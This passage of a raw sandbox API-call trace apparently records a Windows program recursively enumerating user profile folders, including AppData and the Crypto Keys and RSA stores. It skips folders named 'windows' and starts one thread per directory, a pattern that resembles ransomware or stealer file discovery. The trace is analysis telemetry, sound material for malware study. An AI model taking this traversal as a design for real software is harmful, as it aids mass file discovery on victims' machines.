| out: lpFindFileData=0x610fd30*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temporary Internet Files", cAlternateFileName="TEMPOR~1")) returned 0 [0056.922] FindClose (in: hFindFile=0x671770 | out: hFindFile=0x671770) returned 1 Thread: id = 323 os_tid = 0x578 [0042.524] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\*.*", lpFindFileData=0x624fd30 | out: lpFindFileData=0x624fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x23a1d229, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6717f0 [0042.527] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0042.527] FindNextFileW (in: hFindFile=0x6717f0, lpFindFileData=0x624fd30 | out: lpFindFileData=0x624fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x23a1d229, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.527] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0042.527] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0042.527] FindNextFileW (in: hFindFile=0x6717f0, lpFindFileData=0x624fd30 | out: lpFindFileData=0x624fd30*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x23a1d229, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0042.527] lstrcmpW (lpString1=".", lpString2="Microsoft") returned -1 [0042.527] lstrcmpW (lpString1="..", lpString2="Microsoft") returned -1 [0042.527] lstrcmpiW (lpString1="windows", lpString2="Microsoft") returned 1 [0042.730] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\*.*") returned="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\*.*" [0042.730] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\*.*") returned 41 [0042.730] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\", lpString2="Microsoft" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft") returned="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft" [0042.730] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\*.*") returned="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\*.*" [0042.730] GlobalMemoryStatus (in: lpBuffer=0x624fd10 | out: lpBuffer=0x624fd10) [0042.730] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x11609738, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x6f0 [0042.731] CloseHandle (hObject=0x6f0) returned 1 [0042.731] FindNextFileW (in: hFindFile=0x6717f0, lpFindFileData=0x624fd30 | out: lpFindFileData=0x624fd30*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x23a1d229, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 0 [0042.731] FindClose (in: hFindFile=0x6717f0 | out: hFindFile=0x6717f0) returned 1 Thread: id = 324 os_tid = 0x91c [0042.525] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\*.*", lpFindFileData=0xd44fd30 | out: lpFindFileData=0xd44fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x671830 [0042.527] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0042.527] FindNextFileW (in: hFindFile=0x671830, lpFindFileData=0xd44fd30 | out: lpFindFileData=0xd44fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.527] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0042.527] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0042.527] FindNextFileW (in: hFindFile=0x671830, lpFindFileData=0xd44fd30 | out: lpFindFileData=0xd44fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Identities", cAlternateFileName="IDENTI~1")) returned 1 [0042.527] lstrcmpW (lpString1=".", lpString2="Identities") returned -1 [0042.527] lstrcmpW (lpString1="..", lpString2="Identities") returned -1 [0042.527] lstrcmpiW (lpString1="windows", lpString2="Identities") returned 1 [0042.739] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\*.*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\*.*" [0042.739] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\*.*") returned 40 [0042.739] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\", lpString2="Identities" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Identities") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Identities" [0042.739] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Identities", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Identities\\*.*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Identities\\*.*" [0042.739] GlobalMemoryStatus (in: lpBuffer=0xd44fd10 | out: lpBuffer=0xd44fd10) [0042.740] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x116217a0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x6f0 [0042.747] CloseHandle (hObject=0x6f0) returned 1 [0042.747] FindNextFileW (in: hFindFile=0x671830, lpFindFileData=0xd44fd30 | out: lpFindFileData=0xd44fd30*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x160a67d7, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0042.747] lstrcmpW (lpString1=".", lpString2="Microsoft") returned -1 [0042.747] lstrcmpW (lpString1="..", lpString2="Microsoft") returned -1 [0042.747] lstrcmpiW (lpString1="windows", lpString2="Microsoft") returned 1 [0042.749] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\*.*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\*.*" [0042.749] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\*.*") returned 40 [0042.749] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\", lpString2="Microsoft" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft" [0042.749] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\*.*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\*.*" [0042.749] GlobalMemoryStatus (in: lpBuffer=0xd44fd10 | out: lpBuffer=0xd44fd10) [0042.750] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x11639808, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x6f0 [0042.759] CloseHandle (hObject=0x6f0) returned 1 [0042.759] FindNextFileW (in: hFindFile=0x671830, lpFindFileData=0xd44fd30 | out: lpFindFileData=0xd44fd30*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x160a67d7, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 0 [0042.759] FindClose (in: hFindFile=0x671830 | out: hFindFile=0x671830) returned 1 Thread: id = 325 os_tid = 0x3a8 [0042.526] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\*.*", lpFindFileData=0xd6cfd30 | out: lpFindFileData=0xd6cfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3fc949a4, ftCreationTime.dwHighDateTime=0x1ca0445, ftLastAccessTime.dwLowDateTime=0x3fc949a4, ftLastAccessTime.dwHighDateTime=0x1ca0445, ftLastWriteTime.dwLowDateTime=0x3fc949a4, ftLastWriteTime.dwHighDateTime=0x1ca0445, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6717b0 [0042.526] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0042.526] FindNextFileW (in: hFindFile=0x6717b0, lpFindFileData=0xd6cfd30 | out: lpFindFileData=0xd6cfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3fc949a4, ftCreationTime.dwHighDateTime=0x1ca0445, ftLastAccessTime.dwLowDateTime=0x3fc949a4, ftLastAccessTime.dwHighDateTime=0x1ca0445, ftLastWriteTime.dwLowDateTime=0x3fc949a4, ftLastWriteTime.dwHighDateTime=0x1ca0445, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.526] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0042.526] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0042.526] FindNextFileW (in: hFindFile=0x6717b0, lpFindFileData=0xd6cfd30 | out: lpFindFileData=0xd6cfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3fc949a4, ftCreationTime.dwHighDateTime=0x1ca0445, ftLastAccessTime.dwLowDateTime=0x3fc949a4, ftLastAccessTime.dwHighDateTime=0x1ca0445, ftLastWriteTime.dwLowDateTime=0x3fc949a4, ftLastWriteTime.dwHighDateTime=0x1ca0445, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Client", cAlternateFileName="")) returned 1 [0042.526] lstrcmpW (lpString1=".", lpString2="Client") returned -1 [0042.526] lstrcmpW (lpString1="..", lpString2="Client") returned -1 [0042.526] lstrcmpiW (lpString1="windows", lpString2="Client") returned 1 [0042.732] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\*.*" [0042.732] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\*.*") returned 47 [0042.732] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\", lpString2="Client" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client" [0042.732] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\*.*" [0042.732] GlobalMemoryStatus (in: lpBuffer=0xd6cfd10 | out: lpBuffer=0xd6cfd10) [0042.732] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x115f16d0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x698 [0042.740] CloseHandle (hObject=0x698) returned 1 [0042.740] FindNextFileW (in: hFindFile=0x6717b0, lpFindFileData=0xd6cfd30 | out: lpFindFileData=0xd6cfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3fc949a4, ftCreationTime.dwHighDateTime=0x1ca0445, ftLastAccessTime.dwLowDateTime=0x3fc949a4, ftLastAccessTime.dwHighDateTime=0x1ca0445, ftLastWriteTime.dwLowDateTime=0x3fc949a4, ftLastWriteTime.dwHighDateTime=0x1ca0445, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Client", cAlternateFileName="")) returned 0 [0042.740] FindClose (in: hFindFile=0x6717b0 | out: hFindFile=0x6717b0) returned 1 Thread: id = 326 os_tid = 0x790 [0042.529] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\*.*", lpFindFileData=0xd94fd30 | out: lpFindFileData=0xd94fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd96989e, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x671870 [0042.529] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0042.529] FindNextFileW (in: hFindFile=0x671870, lpFindFileData=0xd94fd30 | out: lpFindFileData=0xd94fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd96989e, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.529] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0042.529] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0042.529] FindNextFileW (in: hFindFile=0x671870, lpFindFileData=0xd94fd30 | out: lpFindFileData=0xd94fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd943744, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd943744, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DSS", cAlternateFileName="")) returned 1 [0042.529] lstrcmpW (lpString1=".", lpString2="DSS") returned -1 [0042.529] lstrcmpW (lpString1="..", lpString2="DSS") returned -1 [0042.529] lstrcmpiW (lpString1="windows", lpString2="DSS") returned 1 [0042.746] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\*.*" [0042.746] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\*.*") returned 43 [0042.746] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\", lpString2="DSS" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\DSS") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\DSS" [0042.746] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\DSS", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\*.*" [0042.746] GlobalMemoryStatus (in: lpBuffer=0xd94fd10 | out: lpBuffer=0xd94fd10) [0042.746] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x9762300, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x658 [0042.755] CloseHandle (hObject=0x658) returned 1 [0042.755] FindNextFileW (in: hFindFile=0x671870, lpFindFileData=0xd94fd30 | out: lpFindFileData=0xd94fd30*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xb66d81ea, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Keys", cAlternateFileName="")) returned 1 [0042.755] lstrcmpW (lpString1=".", lpString2="Keys") returned -1 [0042.755] lstrcmpW (lpString1="..", lpString2="Keys") returned -1 [0042.755] lstrcmpiW (lpString1="windows", lpString2="Keys") returned 1 [0042.758] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\*.*" [0042.758] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\*.*") returned 43 [0042.758] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\", lpString2="Keys" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\Keys") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\Keys" [0042.758] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\Keys", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\Keys\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\Keys\\*.*" [0042.758] GlobalMemoryStatus (in: lpBuffer=0xd94fd10 | out: lpBuffer=0xd94fd10) [0042.758] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x116698d8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x658 [0042.760] CloseHandle (hObject=0x658) returned 1 [0042.760] FindNextFileW (in: hFindFile=0x671870, lpFindFileData=0xd94fd30 | out: lpFindFileData=0xd94fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfc65d150, ftLastAccessTime.dwHighDateTime=0x1d2dda1, ftLastWriteTime.dwLowDateTime=0xfc65d150, ftLastWriteTime.dwHighDateTime=0x1d2dda1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RSA", cAlternateFileName="")) returned 1 [0042.760] lstrcmpW (lpString1=".", lpString2="RSA") returned -1 [0042.760] lstrcmpW (lpString1="..", lpString2="RSA") returned -1 [0042.760] lstrcmpiW (lpString1="windows", lpString2="RSA") returned 1 [0042.760] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\*.*" [0042.760] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\*.*") returned 43 [0042.761] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\", lpString2="RSA" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA" [0042.761] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\*.*" [0042.761] GlobalMemoryStatus (in: lpBuffer=0xd94fd10 | out: lpBuffer=0xd94fd10) [0042.761] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5bd0048, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x658 [0042.765] CloseHandle (hObject=0x658) returned 1 [0042.765] FindNextFileW (in: hFindFile=0x671870, lpFindFileData=0xd94fd30 | out: lpFindFileData=0xd94fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfc65d150, ftLastAccessTime.dwHighDateTime=0x1d2dda1, ftLastWriteTime.dwLowDateTime=0xfc65d150, ftLastWriteTime.dwHighDateTime=0x1d2dda1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RSA", cAlternateFileName="")) returned 0 [0042.765] FindClose (in: hFindFile=0x671870 | out: hFindFile=0x671870) returned 1 Thread: id = 327 os_tid = 0x4ac [0042.529] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\*.*", lpFindFileData=0xda8fd30 | out: lpFindFileData=0xda8fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd96989e, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6718b0 [0042.530] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0042.530] FindNextFileW (in: hFindFile=0x6718b0, lpFindFileData=0xda8fd30 | out: lpFindFileData=0xda8fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd96989e, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.530] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0042.530] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0042.530] FindNextFileW (in: hFindFile=0x6718b0, lpFindFileData=0xda8fd30 | out: lpFindFileData=0xda8fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd96989e, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Device", cAlternateFileName="")) returned 1 [0042.530] lstrcmpW (lpString1=".", lpString2="Device") returned -1 [0042.530] lstrcmpW (lpString1="..", lpString2="Device") returned -1 [0042.530] lstrcmpiW (lpString1="windows", lpString2="Device") returned 1 [0042.754] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\*.*" [0042.754] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\*.*") returned 49 [0042.754] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\", lpString2="Device" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device" [0042.754] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\*.*" [0042.754] GlobalMemoryStatus (in: lpBuffer=0xda8fd10 | out: lpBuffer=0xda8fd10) [0042.754] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x11651870, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x700 [0042.759] CloseHandle (hObject=0x700) returned 1 [0042.759] FindNextFileW (in: hFindFile=0x6718b0, lpFindFileData=0xda8fd30 | out: lpFindFileData=0xda8fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd98f9f8, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd98f9f8, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Task", cAlternateFileName="")) returned 1 [0042.759] lstrcmpW (lpString1=".", lpString2="Task") returned -1 [0042.759] lstrcmpW (lpString1="..", lpString2="Task") returned -1 